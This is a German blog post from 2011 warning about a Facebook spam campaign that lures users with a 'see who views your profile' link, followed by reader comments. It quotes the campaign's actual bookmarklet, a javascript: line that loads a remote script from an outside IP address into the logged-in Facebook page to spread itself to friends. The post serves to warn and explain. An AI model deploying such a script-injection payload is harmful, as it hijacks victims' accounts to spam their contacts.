Mittwoch, 20. April 2011

Facebook | XSS-Angriff?!? | Auf alle Fälle SPAM!

Seit kurzem erhalte ich von unterschiedlichen Freunden die bei Facebook gerade offline sind immer die gleichen Nachrichten.
VORNAME wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @http://ow.ly/4DDVJ
Natürlich kommt man dann auf ihrgend eine komische Seite bei der man wieder irgendwas angeben muss! Achtung ihr macht das alle mit eurem Facebook-Login. Und der Seitenbetreiber bekommt jede Menge Daten über euch die ihr ihm sicherlich nicht mitteilen wollt!

Interessant ist auch wenn man sich die Seite hinter dem Link einmal nüchtern ansieht. Hier wird man aufgeforder sich bei Facebook anzumelden und dann ein Script in den Adressbereich des Browsers einzugeben...
Ja, schon ab hier kann man von XSS(Cross site scripting) sprechen. Es wird gezielt versucht Facebook zwischen verschieden Seitenaufrufen zu manipulieren. Hinter dem Code steckt nach meinen ersten Erkenntnissen nicht mehr, als dass bei einem Aufruf über die Chatfunktion von Facebook per zufall(Math.random()) immer mehr Leute(Freunde) dieser Link geschickt wird!!

Ein massives Spamscript also!


javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://216.24.202.125/invite.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

Was genau passiert kann man hier unter http://216.24.202.125/invite.php sehen.

mehr zum Thema:

- Auf T-Online "Facebook-Spam überrollt soziales Netzwerk

Kommentare:

  1. wie bekomm ich das wieder weg ?

    AntwortenLöschen
  2. ich denke ein browser neustart reicht aus, da es sich ja um ein java script handelt ?

    AntwortenLöschen
  3. hinter dem skript steckt ein wenig mehr :) es erstellt noch ein event und noch ne statusmeldung, sowie verschickt an die offline benutzer nachrichten...es ist ein massives spamskript, was sehr interressant ist, sich damit mal zu befassen: http://nuit.homeunix.net/blag/?p=205

    AntwortenLöschen